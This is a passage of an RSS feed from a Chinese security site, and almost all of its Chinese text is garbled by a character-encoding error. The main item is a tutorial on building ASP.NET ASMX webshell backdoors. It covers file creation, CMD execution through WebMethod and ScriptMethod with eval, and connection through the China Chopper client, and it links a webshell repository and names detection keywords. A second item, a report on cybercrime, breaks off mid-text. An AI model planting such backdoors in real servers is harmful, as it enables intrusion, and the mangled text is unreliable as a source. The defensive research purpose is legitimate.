WebService,然åŽç”Ÿæˆç›¸åº”çš„SOAP应ç”。WebæœåŠ¡å™¨å¾—åˆ°SOAP应ç”åŽï¼Œåœ¨é€šè¿‡HTTP应ç”的方å¼å°†å…¶è¿”回给客户端,但WebService也支æŒHTTP POST请求,仅需è¦åœ¨æœåŠ¡ç«¯å¢žåŠ ä¸€é¡¹é…ç½®å³å¯ã€‚ 0×03 一å¥è¯çš„实现 3.1ã€WebMethod 在Web Service程åºä¸ï¼Œå¦‚果一个公共方法想被外界访问调用的è¯ï¼Œå°±éœ€è¦åŠ ä¸ŠWebMethodï¼ŒåŠ ä¸Š[WebMethod]属性的公有方法就å¯ä»¥è¢«è®¿é—®ï¼Œè€Œæ²¡æœ‰åŠ è¿™ä¸ªå±žæ€§çš„æ–¹æ³•å°±æ˜¯ä¸èƒ½è¢«è®¿é—®çš„。将 WebMethod 属性 (Attribute) é™„åŠ åˆ° Public 方法表示希望将该方法公开为 XML Web services 的一部分,它具备6个属性:Description ã€EnableSessionã€MessageNameã€TransactionOptionã€CacheDurationã€BufferResponse,为了更清晰的表述WebService请看下é¢è¿™æ®µä»£ç å®¢æˆ·ç«¯é¢„è§ˆåŽ è¿™é‡Œå£°æ˜Žæˆä¸€ä¸ªå—符串类型的公共方法HelloWorldï¼Œå¦‚æžœæ¤æ—¶åœ¨æ–¹æ³•体内实现创建aspx文件,ä¿å˜å†…容为一å¥è¯å°é©¬çš„è¯é‚£ä¹ˆè¿™ä¸ªWebServiceå°±å˜æˆäº†æœåŠ¡åŽé—¨ï¼Œä¾ç…§è¿™ä¸ªæŽ¨ç†å°±äº§ç”Ÿäº†C#版本的WebServiceå°é©¬ï¼Œå®žçŽ°äº†ä¸¤ä¸ªåŠŸèƒ½ï¼Œä¸€ä¸ªæ˜¯åˆ›å»ºæ–‡ä»¶ï¼Œè¿˜æœ‰ä¸€ä¸ªæ˜¯æ‰§è¡ŒCMDå‘½ä»¤ï¼Œæ ¸å¿ƒä»£ç 如下:  å°é©¬è¿è¡ŒåŽæ‰§è¡Œwhoami命令之åŽä»¥é»˜è®¤XMLæ ¼å¼å›žæ˜¾æ•°æ®ï¼Œå¦‚下图  知é“原ç†åŽå°±å¼€å§‹ç€æ‰‹æ‰“é€ èœåˆ€å¯ç”¨çš„一å¥è¯æœ¨é©¬ï¼Œå’Œä¸€èˆ¬å¤„ç†ç¨‹åºç±»ä¼¼é€šè¿‡Jscript.Netçš„evalæ–¹æ³•åŽ»å®žçŽ°ä»£ç æ‰§è¡Œï¼Œå‰æ–‡æœ‰æåˆ°WebMethodå˜åœ¨å¤šä¸ªå±žæ€§ä¸”æ ¹æ®å¾®è½¯çš„官方文档 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29 å¯ä»¥å¾—出Jscript.Netä¸å¯ä»¥ä½¿ç”¨WebMethodAttribute æ¥æ›¿ä»£[WebMethod]。 一å¥è¯å®žçŽ°çš„ä»£ç 如下: 打开æµè§ˆå™¨ï¼Œæµ‹è¯•效果如下  笔者ä¾ç…§SOAP1.1çš„è§„èŒƒè¦æ±‚,å‘é€è¯·æ±‚的数æ®åŒ…å°±å¯ä»¥å®žçް䏀å¥è¯ä»£ç 执行,这里还是拿当å‰çš„æ—¥æœŸæ—¶é—´ä½œä¸ºæ”»å‡»è½½è·ï¼Œå¦‚下图  3.2ã€ScriptMethod 在探索WebMethod的时候,å‘现VisualStudio有段注释如下图 å½“å®¢æˆ·ç«¯è¯·æ±‚çš„æ–¹å¼æ˜¯AJAX的时候会导入System.Web.Script.Services.ScriptService命å空间,笔者å°è¯•去挖掘一下å¯èƒ½å˜åœ¨çš„æ–°çš„æ”»å‡»ç‚¹  代ç 里ResponseFormat表示方法è¦è¿”回的类型,一般为Json或者XML; UseHttpGetç‰äºŽtrue表示å‰å°çš„ajax是通过GETå¯ä»¥è®¿é—®æ¤æ–¹æ³•,如果å‰å°ajax通过POST,则报错。 æ ¹æ®C#ä¸çš„代ç å¯çŸ¥éœ€è¦é…ç½®WebMethodå’ŒScriptMethodæ‰èƒ½æ£å¸¸çŽ©è½¬ï¼Œè€Œåœ¨Jscript.Netä¸å®žçŽ°è¿™ä¸¤ä¸ªåŠŸèƒ½çš„åˆ†ç±»æ˜¯WebMethodAttribute类和ScriptMethodAttribute类,最终 写出一å¥è¯æœ¨é©¬æœåŠ¡ç«¯ä»£ç : 客户端输入 Response.Write(DateTime.Now)æˆåŠŸæ‰“å°å‡ºå½“剿—¶é—´ï¼Œè¡¨ç¤ºä¸€å¥è¯æˆåŠŸè¿è¡Œï¼ 坿ƒœçš„æ˜¯è¿™ç§æ–¹æ³•䏿”¯æŒ.NET  2.0ç©¶å…¶åŽŸå› æ˜¯using System.Web.Script.Services;这个命å空间并ä¸åœ¨System.Webä¸ï¼Œè€Œæ˜¯åœ¨ajax扩展ä¸éœ€è¦é¢å¤–安装ASP.NET 2.0 AJAX  Extensions,所以在2.0的环境下尽é‡é¿å…使用该方法。 0X04 èœåˆ€è¿žæŽ¥ èœåˆ€ä¸æ”¯æŒSOAPçš„æ–¹å¼æäº¤payload,直接连接asmx文件就会出现下图错误 第一ç§è§£å†³æ–¹æ³•å¯ä»¥è‡ªå·±å†™ä»£ç 实现支æŒSOAP的客户端; 第二ç§åŠžæ³•å‚考asmx页颿œ€ä¸‹æ–¹ç»™å‡ºçš„HTTP POSTæäº¤æ–¹å¼ï¼› 本地环境下用èœåˆ€è¿žæŽ¥æ²¡é—®é¢˜ï¼Œå¯ä»¥æ£å¸¸è¿žæŽ¥ 但通常部署到æœåŠ¡å™¨ä¸Šå¯èƒ½ä¼šé‡åˆ°ä¸‹é¢çš„æç¤º 解决上述的问题需è¦åœ¨web.configä¸é…ç½®webServices节点接收的Protoclos节点下需è¦åŒ…å«HttpPost  多数情况下程åºå¼€å‘者会支æŒHTTP POST请求,所以对æ¤ä¸å¿…过于担心。笔者基于优化考虑将asmxWebMethodSpy.asmx进一æ¥åŽ‹ç¼©ä½“ç§¯åŽåªæœ‰499个å—节,asmxScriptMethodSpy.asmxä¹Ÿåªæœ‰547个å—节。  0×05 防御措施 1. […]]]></description>
1722 <content:encoded><![CDATA[<h2>0×01 å‰è¨€<br /></h2>
1723<p><b style="color: rgb(0, 176, 80);">上篇介ç»äº†<a href="http://www.freebuf.com/column/177781.html" target="_blank" ref="">一般处ç†ç¨‹åºï¼ˆashx)的工作原ç†</a>以åŠå®žçް䏀å¥è¯æœ¨é©¬çš„过程,今天接ç€ä»‹ç»Web Service程åºï¼ˆasmx)下的工作原ç†å’Œå¦‚何实现一å¥è¯æœ¨é©¬ï¼Œå½“然介ç»ä¹‹å‰ç¬”者找到了一款asmx马儿 <a href="https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx">https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx</a> ï¼Œä¾æ—§æ˜¯ä¸€ä¸ªå¤§é©¬å¦‚下图:</b></p>
1724<p><img src="http://image.3001.net/images/20180719/15319714816588.png!small"></p>
1725<p>è¿™ä¸ªè¿˜åªæ˜¯å¯¹å®¢æˆ·ç«¯çš„èœåˆ€åšäº†é€‚é…å¯ç”¨ï¼Œæš‚æ—¶ä¸ç¬¦åˆä¸€å¥è¯æœ¨é©¬çš„ç‰¹ç‚¹å“ˆï¼Œè‡³äºŽè¦æ‰“é€ ä¸€æ¬¾å±…å®¶æ—…è¡Œå¿…å¤‡çš„èœåˆ€é©¬ï¼Œè¿˜å¾—从原ç†ä¸Šæžæ¸…楚 asmxçš„è¿è¡Œè¿‡ç¨‹ã€‚ </p>
1726<h2>0×02 简介和原ç†</h2>
1727<p>Web Service是一个基于å¯ç¼–程的web的应用程åºï¼Œç”¨äºŽå¼€å‘分布å¼çš„互æ“作的应用程åºï¼Œä¹Ÿæ˜¯ä¸€ç§webæœåŠ¡ï¼ŒWeb Service的主è¦ç›®æ ‡æ˜¯è·¨å¹³å°çš„å¯äº’æ“ä½œæ€§ï¼Œä¸ºäº†å®žçŽ°è¿™ä¸€ç›®æ ‡Web Service 完全基于XMLï¼ˆå¯æ‰©å±•æ ‡è®°è¯è¨€ï¼‰ã€XSD(XML Schema)ç‰ç‹¬ç«‹äºŽå¹³å°ã€ç‹¬ç«‹äºŽè½¯ä»¶ä¾›åº”å•†çš„æ ‡å‡†ï¼Œæ˜¯åˆ›å»ºå¯äº’æ“作的ã€åˆ†å¸ƒå¼åº”用程åºçš„æ–°å¹³å°ã€‚简å•çš„æ¥è¯´Web Service具备三个è¦ç´ SOAP(Simple Object Access Protocol)ã€WSDL(WebServicesDescriptionLanguage)ã€UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAPç”¨æ¥æè¿°ä¼ é€’ä¿¡æ¯çš„æ ¼å¼ï¼Œ WSDL ç”¨æ¥æè¿°å¦‚ä½•è®¿é—®å…·ä½“çš„æŽ¥å£ï¼Œ UDDI用æ¥ç®¡ç†ï¼Œåˆ†å‘查询webService ï¼Œä¹Ÿå› æ¤ä½¿ç”¨Web Service有许多优点,例如å¯ä»¥è·¨å¹³å°å·¥ä½œã€éƒ¨ç½²å‡çº§ç»´æŠ¤èµ·æ¥ç®€å•方便ã€å®žçŽ°å¤šæ•°æ®å¤šä¸ªæœåŠ¡çš„èšåˆä½¿ç”¨ç‰ç‰ã€‚å†ç»“åˆä¸‹å›¾è¯´æ˜Žä¸€ä¸‹WebService工作的æµç¨‹</p>
1728<p><img src="http://image.3001.net/images/20180719/15319715209609.png!small"></p>
1729<p>æ— è®ºä½¿ç”¨ä»€ä¹ˆå·¥å…·ã€è¯è¨€ç¼–写WebService,都å¯ä»¥ä½¿ç”¨ SOAP å议通过 HTTP调用,创建 WebService åŽï¼Œä»»ä½•è¯è¨€ã€å¹³å°çš„客户都å¯ä»¥é˜…读 WSDL 文档æ¥è°ƒç”¨ WebService ï¼ŒåŒæ—¶å®¢æˆ·ç«¯ä¹Ÿå¯ä»¥æ ¹æ® WSDL æè¿°æ–‡æ¡£ç”Ÿæˆä¸€ä¸ª SOAP 请求信æ¯å¹¶å‘é€åˆ°WebæœåŠ¡å™¨ï¼ŒWebæœåС噍å†å°†è¯·æ±‚转å‘ç»™WebService 请求处ç†å™¨ã€‚</p>
1730<p>对于.Net而言,WebService请求处ç†å™¨åˆ™æ˜¯ä¸€ä¸ª .NET Framework 自带的 ISAPI Extension。Web请求处ç†å™¨ç”¨äºŽè§£æžæ”¶åˆ°çš„SOAP请求,调用 WebService,然åŽç”Ÿæˆç›¸åº”çš„SOAP应ç”。WebæœåŠ¡å™¨å¾—åˆ°SOAP应ç”åŽï¼Œåœ¨é€šè¿‡HTTP应ç”的方å¼å°†å…¶è¿”回给客户端,但WebService也支æŒHTTP POST请求,仅需è¦åœ¨æœåŠ¡ç«¯å¢žåŠ ä¸€é¡¹é…ç½®å³å¯ã€‚</p>
1731<h2>0×03 一å¥è¯çš„实现</h2>
1732<h3>3.1ã€WebMethod</h3>
1733<p>在Web Service程åºä¸ï¼Œå¦‚果一个公共方法想被外界访问调用的è¯ï¼Œå°±éœ€è¦åŠ ä¸ŠWebMethodï¼ŒåŠ ä¸Š[WebMethod]属性的公有方法就å¯ä»¥è¢«è®¿é—®ï¼Œè€Œæ²¡æœ‰åŠ è¿™ä¸ªå±žæ€§çš„æ–¹æ³•å°±æ˜¯ä¸èƒ½è¢«è®¿é—®çš„。将 WebMethod 属性 (Attribute) é™„åŠ åˆ° Public 方法表示希望将该方法公开为 XML Web services 的一部分,它具备6个属性:Description ã€EnableSessionã€MessageNameã€TransactionOptionã€CacheDurationã€BufferResponse,为了更清晰的表述WebService请看下é¢è¿™æ®µä»£ç </p>
1734<p><img src="http://image.3001.net/images/20180719/15319718869912.png!small"></p>
1735<p>客户端预览åŽ</p>
1736<p><img src="http://image.3001.net/images/20180719/15319715792826.png!small"></p>
1737<p>这里声明æˆä¸€ä¸ªå—符串类型的公共方法HelloWorldï¼Œå¦‚æžœæ¤æ—¶åœ¨æ–¹æ³•体内实现创建aspx文件,ä¿å˜å†…容为一å¥è¯å°é©¬çš„è¯é‚£ä¹ˆè¿™ä¸ªWebServiceå°±å˜æˆäº†æœåŠ¡åŽé—¨ï¼Œä¾ç…§è¿™ä¸ªæŽ¨ç†å°±äº§ç”Ÿäº†C#版本的WebServiceå°é©¬ï¼Œå®žçŽ°äº†ä¸¤ä¸ªåŠŸèƒ½ï¼Œä¸€ä¸ªæ˜¯åˆ›å»ºæ–‡ä»¶ï¼Œè¿˜æœ‰ä¸€ä¸ªæ˜¯æ‰§è¡ŒCMDå‘½ä»¤ï¼Œæ ¸å¿ƒä»£ç 如下: </p>
1738<p><img src="http://image.3001.net/images/20180719/15319716815877.png!small"><img src="http://image.3001.net/images/20180719/15319717042847.png!small">å°é©¬è¿è¡ŒåŽæ‰§è¡Œwhoami命令之åŽä»¥é»˜è®¤XMLæ ¼å¼å›žæ˜¾æ•°æ®ï¼Œå¦‚下图 </p>
1739<p><img src="http://image.3001.net/images/20180719/15319717567887.png!small"></p>
1740<p>知é“原ç†åŽå°±å¼€å§‹ç€æ‰‹æ‰“é€ èœåˆ€å¯ç”¨çš„一å¥è¯æœ¨é©¬ï¼Œå’Œä¸€èˆ¬å¤„ç†ç¨‹åºç±»ä¼¼é€šè¿‡Jscript.Netçš„evalæ–¹æ³•åŽ»å®žçŽ°ä»£ç æ‰§è¡Œï¼Œå‰æ–‡æœ‰æåˆ°WebMethodå˜åœ¨å¤šä¸ªå±žæ€§ä¸”æ ¹æ®å¾®è½¯çš„官方文档 <a href="https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3Dvs.80%29">https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29</a> å¯ä»¥å¾—出Jscript.Netä¸å¯ä»¥ä½¿ç”¨WebMethodAttribute æ¥æ›¿ä»£[WebMethod]。</p>
1741<p>一å¥è¯å®žçŽ°çš„ä»£ç 如下:</p>
1742<p><img src="http://image.3001.net/images/20180719/15319717968560.png!small">打开æµè§ˆå™¨ï¼Œæµ‹è¯•效果如下 </p>
1743<p><img src="http://image.3001.net/images/20180719/15319719181734.png!small"></p>
1744<p>笔者ä¾ç…§SOAP1.1çš„è§„èŒƒè¦æ±‚,å‘é€è¯·æ±‚的数æ®åŒ…å°±å¯ä»¥å®žçް䏀å¥è¯ä»£ç 执行,这里还是拿当å‰çš„æ—¥æœŸæ—¶é—´ä½œä¸ºæ”»å‡»è½½è·ï¼Œå¦‚下图 </p>
1745<p><img src="http://image.3001.net/images/20180719/15319719331646.png!small"></p>
1746<h3>3.2ã€ScriptMethod</h3>
1747<p>在探索WebMethod的时候,å‘现VisualStudio有段注释如下图</p>
1748<p><img src="http://image.3001.net/images/20180719/15319719465013.png!small">å½“å®¢æˆ·ç«¯è¯·æ±‚çš„æ–¹å¼æ˜¯AJAX的时候会导入System.Web.Script.Services.ScriptService命å空间,笔者å°è¯•去挖掘一下å¯èƒ½å˜åœ¨çš„æ–°çš„æ”»å‡»ç‚¹ </p>
1749<p><img src="http://image.3001.net/images/20180719/15319719664904.png!small"></p>
1750<p>代ç 里ResponseFormat表示方法è¦è¿”回的类型,一般为Json或者XML; UseHttpGetç‰äºŽtrue表示å‰å°çš„ajax是通过GETå¯ä»¥è®¿é—®æ¤æ–¹æ³•,如果å‰å°ajax通过POST,则报错。</p>
1751<p>æ ¹æ®C#ä¸çš„代ç å¯çŸ¥éœ€è¦é…ç½®WebMethodå’ŒScriptMethodæ‰èƒ½æ£å¸¸çŽ©è½¬ï¼Œè€Œåœ¨Jscript.Netä¸å®žçŽ°è¿™ä¸¤ä¸ªåŠŸèƒ½çš„åˆ†ç±»æ˜¯WebMethodAttribute类和ScriptMethodAttribute类,最终</p>
1752<p>写出一å¥è¯æœ¨é©¬æœåŠ¡ç«¯ä»£ç :</p>
1753<p><img src="http://image.3001.net/images/20180719/15319719923392.png!small">客户端输入 Response.Write(DateTime.Now)æˆåŠŸæ‰“å°å‡ºå½“剿—¶é—´ï¼Œè¡¨ç¤ºä¸€å¥è¯æˆåŠŸè¿è¡Œï¼</p>
1754<p><img src="http://image.3001.net/images/20180719/15319720212810.png!small"></p>
1755<p><img src="http://image.3001.net/images/20180719/153197202730.png!small"></p>
1756<p>坿ƒœçš„æ˜¯è¿™ç§æ–¹æ³•䏿”¯æŒ.NET 2.0ç©¶å…¶åŽŸå› æ˜¯using System.Web.Script.Services;这个命å空间并ä¸åœ¨System.Webä¸ï¼Œè€Œæ˜¯åœ¨ajax扩展ä¸éœ€è¦é¢å¤–安装ASP.NET 2.0 AJAX </p>
1757<p>Extensions,所以在2.0的环境下尽é‡é¿å…使用该方法。</p>
1758<h2>0X04 èœåˆ€è¿žæŽ¥</h2>
1759<p>èœåˆ€ä¸æ”¯æŒSOAPçš„æ–¹å¼æäº¤payload,直接连接asmx文件就会出现下图错误</p>
1760<p><img src="http://image.3001.net/images/20180719/15319720528158.png!small"></p>
1761<p>第一ç§è§£å†³æ–¹æ³•å¯ä»¥è‡ªå·±å†™ä»£ç 实现支æŒSOAP的客户端;</p>
1762<p>第二ç§åŠžæ³•å‚考asmx页颿œ€ä¸‹æ–¹ç»™å‡ºçš„HTTP POSTæäº¤æ–¹å¼ï¼›</p>
1763<p><img src="http://image.3001.net/images/20180719/15319720827912.png!small">本地环境下用èœåˆ€è¿žæŽ¥æ²¡é—®é¢˜ï¼Œå¯ä»¥æ£å¸¸è¿žæŽ¥</p>
1764<p><img src="http://image.3001.net/images/20180719/1531972095995.png!small"></p>
1765<p><img src="http://image.3001.net/images/20180719/15319721028773.png!small"></p>
1766<p>但通常部署到æœåŠ¡å™¨ä¸Šå¯èƒ½ä¼šé‡åˆ°ä¸‹é¢çš„æç¤º</p>
1767<p><img src="http://image.3001.net/images/20180719/15319721454688.png!small"></p>
1768<p>解决上述的问题需è¦åœ¨web.configä¸é…ç½®webServices节点接收的Protoclos节点下需è¦åŒ…å«HttpPost </p>
1769<p><img src="http://image.3001.net/images/20180719/15319721582326.png!small">多数情况下程åºå¼€å‘者会支æŒHTTP POST请求,所以对æ¤ä¸å¿…过于担心。笔者基于优化考虑将asmxWebMethodSpy.asmx进一æ¥åŽ‹ç¼©ä½“ç§¯åŽåªæœ‰499个å—节,asmxScriptMethodSpy.asmxä¹Ÿåªæœ‰547个å—节。 </p>
1770<p><img src="http://image.3001.net/images/20180719/15319721743083.png!small"></p>
1771<h2>0×05 防御措施</h2>
1772<p>1. 通过èœåˆ€è¿žæŽ¥çš„æ–¹å¼ï¼Œæ·»åŠ å¯ä»¥æ£€æµ‹èœåˆ€å…³é”®ç‰¹å¾çš„规则;</p>
1773<p>2. 对于Web应用æ¥è¯´ï¼Œå°½é‡ä¿è¯ä»£ç 的安全性;</p>
1774<p>3. 对于IDSè§„åˆ™å±‚é¢æ¥è¯´ï¼Œä¸Šä¼ 的时候å¯ä»¥åŠ å…¥WebMethodAttributeç‰å…³é”®è¯çš„æ£€æµ‹</p>
1775<h2>0×06 å°ç»“</h2>
1776<p>1. 还有本文æä¾›äº†ä¸¤ç§æ–¹å¼å®žçްasmx一å¥è¯çš„æ€è·¯ï¼Œå½“ç„¶è¿˜æœ‰æ›´å¤šç¼–å†™ä¸€å¥è¯çš„æŠ€å·§æœ‰å¾…å‘æŽ˜ï¼Œä¸‹æ¬¡å°†ä»‹ç»å¦å¤–一ç§å§¿åŠ¿ï¼Œæ•¬è¯·æœŸå¾…ï¼›</p>
1777<p>2. æ–‡ç« çš„ä»£ç 片段请å‚考 <a href="https://github.com/Ivan1ee">https://github.com/Ivan1ee</a> ï¼›</p>
1778<h2>0×07 å‚考链接</h2>
1779<blockquote><p><a href="https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3Dvs.80%29">https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29</a></p>
1780<p><a href="https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx">https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx</a></p>
1781<p><a href="https://www.cnblogs.com/bpdwn/p/3479421.html">https://www.cnblogs.com/bpdwn/p/3479421.html</a></p>
1782<p><a href="https://github.com/Ivan1ee">https://github.com/Ivan1ee</a></p>
1783</blockquote>
1784<p><b style="color: rgb(159, 163, 168);">*本文作者:360云影实验室,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1785]]></content:encoded>
1786 <wfw:commentRss>http://www.freebuf.com/articles/web/178010.html/feed</wfw:commentRss>
1787 <slash:comments>2</slash:comments>
1788 </item>
1789 <item>
1790 <title>ä»Žå¸æ³•角度看互è”网黑产</title>
1791 <link>http://www.freebuf.com/articles/network/178114.html</link>
1792 <comments>http://www.freebuf.com/articles/network/178114.html#comments</comments>
1793 <pubDate>Wed, 25 Jul 2018 00:30:37 +0000</pubDate>
1794 <dc:creator>boshit</dc:creator>
1795 <category><![CDATA[网络安全]]></category>
1796 <category><![CDATA[互è”网]]></category>
1797 <category><![CDATA[叿³•]]></category>
1798 <category><![CDATA[黑产]]></category>
1799
1800 <guid isPermaLink="false">http://www.freebuf.com/?p=178114</guid>
1801 <description><![CDATA[上个月,北京市海淀区人民检察院å‘å¸ƒäº†ã€Šç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦ã€‹ã€‚ ã€Šç™½çš®ä¹¦ã€‹æ ¹æ®æµ·æ·€æ£€å¯Ÿé™¢2016å¹´9月以æ¥å—ç†çš„450èµ·ç½‘ç»œçŠ¯ç½ªæ¡ˆä»¶ï¼Œä»Žå¸æ³•的角度,结åˆå…·ä½“æ¡ˆä¾‹ï¼Œæ€»ç»“äº†æˆ‘å›½è¿‘å‡ å¹´æ¥äº’è”网黑产行业的现状。 《白皮书》æ€ç»´å¯¼å›¾ï¼Œç‚¹å‡»å›¾ç‰‡å¯æŸ¥çœ‹å¤§å›¾ ä¸€ã€æ¡ˆä»¶åŸºæœ¬æƒ…况 2016å¹´9月以æ¥,北京市海淀区人民检察院å—ç†ç½‘络犯罪案件450件(1076人),å…¶ä¸å®¡æŸ¥é€®æ•245件(588人),审查起诉205件(488人),涉åŠ27个罪å。 å„ç±»åž‹çŠ¯ç½ªå æ¯” äºŒã€æ¡ˆä»¶ç‰¹å¾ 1 低龄ã€ä½Žå¦åŽ†åŒ– 犯罪主体呈现低龄ã€ä½Žå¦åŽ†åŒ–ç‰¹å¾ã€‚ 犯罪普é呈现年轻低龄化: 1990å¹´-1999年出生的221人,å æ¯”37.58%ï¼› 1980å¹´-1989年出生283人,å æ¯”A812%ï¼› 1970年以å‰å‡ºç”Ÿäººæ•°ä»…å 14.11%。  犯罪的行为人普éå¦åŽ†è¾ƒä½Žï¼š 本科åŠå…¶ä»¥ä¸Šå¦åކ82人,ä»…å 21%ï¼› 高ä¸ã€é«˜èŒæ•™è‚²ä¸»ä½“68人,åˆä¸ã€ä¸ä¸“ã€å°å¦ç‰æ•™è‚²ä¸»ä½“242人,å 62.5%。 男性主体å 较大比é‡,审查起诉案件ä¸ç”·æ€§379人,å æ¯”77.66%。 2 跨地域作案 çªç ´äº†ä¼ 统地域空间的é™åˆ¶,è·¨åœ°åŸŸä½œæ¡ˆç‰¹å¾æ˜Žæ˜¾ã€‚作案地点涵盖全国28个çœã€å¸‚ã€è‡ªæ²»åŒºã€‚ 一是犯罪行为实施地和犯罪结果地之间跨地域。 二是犯罪主体之间跨地域。 三是掩饰ã€éšçž’赃物跨区域。 3 产业化 犯罪行为产业化,æ—¥æ¸å½¢æˆå®Œæ•´ã€é—åˆçš„产业链æ¡ã€‚è¾ƒä¹‹äºŽä¼ ç»ŸçŠ¯ç½ª,网络犯罪的产业化链æ¡ç‰¹å¾æ˜Žæ˜¾,产业链的上ã€ä¸ã€ä¸‹æ¸¸çŠ¯ç½ªåˆ†å·¥æ˜Žç¡®ã€‚ 4 组织化 犯罪组织多以公å¸ã€é›†å›¢çš„å½¢æ€å‡ºçŽ°ã€‚ä»¥æ³¨å†Œå…¬å¸å½¢å¼,æœ‰ç»„ç»‡ã€æœ‰è§„模地实施犯罪行为。 5 范围广 å—害人数多,犯罪数é¢å¤§,å½±å“范围广。 6 å…¨çƒåŒ– 跨国犯罪趋势增强,å…¨çƒåŒ–ç‰¹å¾æ˜Žæ˜¾ã€‚ ä¸‰ã€æ¡ˆä»¶ç±»åž‹ 网络空间å‘ç”Ÿçš„è¿æ³•犯罪行为,既有å¯èƒ½æ˜¯åˆ©ç”¨ç½‘ç»œå®žæ–½çš„ä¼ ç»Ÿè¿æ³•犯罪,也å¯èƒ½æ˜¯é’ˆå¯¹ç½‘ç»œã€æ•°æ®æœ¬èº«çš„è¿æ³•çŠ¯ç½ªè¡Œä¸ºã€‚æœ¬æ–‡å°†ç½‘ç»œçŠ¯ç½ªåˆ†ä¸ºï¼šç½‘ç»œé»‘äº§çŠ¯ç½ªå’Œç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ªã€‚ 网络黑产犯罪以计算机数æ®ã€ç¨‹åºç³»ç»Ÿæˆ–者软件ç‰ä½œä¸ºçŠ¯ç½ªå¯¹è±¡,å½¢æˆäº†ä¸€æ¡å°é—的产业链。上游æä¾›å·¥å…·å’Œå¹³å°ï¼Œä¸æ¸¸èŽ·å–ä¿¡æ¯ã€æ¸…æ´—æ•°æ®,下游精准诈骗产ã€ç›—窃财产,呈现产业化ã€å…¬å¸åŒ–ã€å¹³å°åŒ–的特å¾ï¼Œå¤§å¤§é™ä½Žäº†çŠ¯ç½ªæˆæœ¬,æé«˜äº†çŠ¯ç½ªæ•ˆçŽ‡ã€‚å®žè·µä¸æ¤ç±»æ¡ˆä»¶ä»¥ç ´å计算机信æ¯ç³»ç»Ÿç½ªã€éžæ³•获å–计算机信æ¯ç³»ç»Ÿæ•°æ®ç½ªã€ä¾µçŠ¯å…¬æ°‘ä¸ªäººä¿¡æ¯ç½ªä¸ºä¸»ã€‚ ä¼ ç»ŸçŠ¯ç½ªçš„ç½‘ç»œåŒ–,æ˜¯çŽ°å®žçš„çŠ¯ç½ªä¸»ä½“åˆ©ç”¨ä¿¡æ¯æŠ€æœ¯åœ¨ç½‘ç»œç©ºé—´å®žæ–½çš„çŠ¯ç½ªè¡Œä¸º,æ²¡æœ‰åˆ›è®¾æ–°çš„æ³•å¾‹å…³ç³»ã€‚ç½‘ç»œç©ºé—´åªæ˜¯çŠ¯ç½ªçš„è½½ä½“,è®¡ç®—æœºåªæ˜¯è¾…åŠ©æ‰‹æ®µã€‚å¦‚è½¬ç§»åˆ°çº¿ä¸Šçš„éžæ³•叿”¶å…¬ä¼—å˜æ¬¾ã€é›†èµ„诈骗ç‰çŠ¯ç½ªã€‚æ¤å¤–,ä¼ æ’æ·«ç§½ç‰©å“牟利罪ã€å¼€è®¾èµŒåœºç½ªç‰ä¼ 统犯罪也日æ¸å¤šå‘,呈现出新的特点。 å››ã€ç½‘络黑产犯罪 网络黑产已ç»ä»ŽåŽŸå§‹ç²—æ”¾çš„ä¼ æ’æœ¨é©¬ç—…毒ã€ç”µè¯è¯ˆéª—转化为更为先进的拖库撞库ã€ç²¾å‡†è¯ˆéª—,å½¢æˆå分æˆç†Ÿçš„è¿ä½œæ¨¡å¼,äº§ä¸šé“¾å¤æ‚ã€éšè”½ã€å®Œæ•´ã€é«˜æ•ˆã€‚ 上游技术供应商,承担ç€åˆ¶ä½œæœ¨é©¬ã€æ¶æ„代ç 肉鸡网络ã€åЍæ€ipéžæ³•æœåŠ¡ç‰æŠ€æœ¯å·¥å…·æœåŠ¡; 䏿¸¸æ•°æ®æœåС商ã€é»‘市交易平å°,在产业链ä¸å……当数æ®ç”Ÿäº§è€…和交易æœåŠ¡æä¾›è€…的角色; ä¸‹æ¸¸è¡Œä¸ºäººåˆ©ç”¨ä¸æ¸¸çš„æ•°æ®å’Œå¹³å°å®žçŽ°ç›´æŽ¥è¯ˆéª—ã€â€œè–…羊毛â€ã€æµé‡åŠ«æŒç‰çŠ¯ç½ªã€‚ 在该产业链ä¸,基于行为人目的的ä¸åŒ,上ã€ä¸ã€ä¸‹æ¸¸å¯ä»¥ä»»æ„组åˆ,å½¢æˆå…¸åž‹æˆ–éžå…¸åž‹çš„网络黑产犯罪。 1 ä¸Šæ¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž ä¸Šæ¸¸çŠ¯ç½ªçš„å‡ºçŽ°æ˜¯ç½‘ç»œé»‘äº§äº§ä¸šåŒ–çš„ä½“çŽ°ã€‚ ç½‘ç»œå¹³å°æä¾›è€… éžæ³•利用信æ¯ç½‘络。 ä¸ºå®žæ–½çŠ¯ç½ªè€Œä¸“é—¨æž¶è®¾éžæ³•网站,多数用于实施“钓鱼诈骗â€,属于电信诈骗犯罪ä¸ä¸å¯æˆ–缺的关键环节。 专门黑客类网站æˆä¸ºçŠ¯ç½ªæ–¹æ³•ã€çŠ¯ç½ªå·¥å…·ã€è¿æ³•ä¿¡æ¯çš„呿ºåœ°ã€‚ QQ群ã€å¾®ä¿¡ç¾¤ç‰é€šè®¯ç¾¤ç»„便—§æ˜¯è¿æ³•ä¿¡æ¯äº¤æ˜“ã€äº¤æ¢çš„ä¸»è¦æ¸ é“ã€‚å¤šæ•°è¿æ³•行为人倾å‘选择使用第三方支付æœåС平å°è¿›è¡Œèµ„金结算,而网络æœåŠ¡æä¾›è€…对公民个人éšç§ä¿æŠ¤å’Œä¾¦æŸ¥æœºå…³å–è¯éœ€æ±‚之间的矛盾日益凸显。 技术工具æä¾›è€… 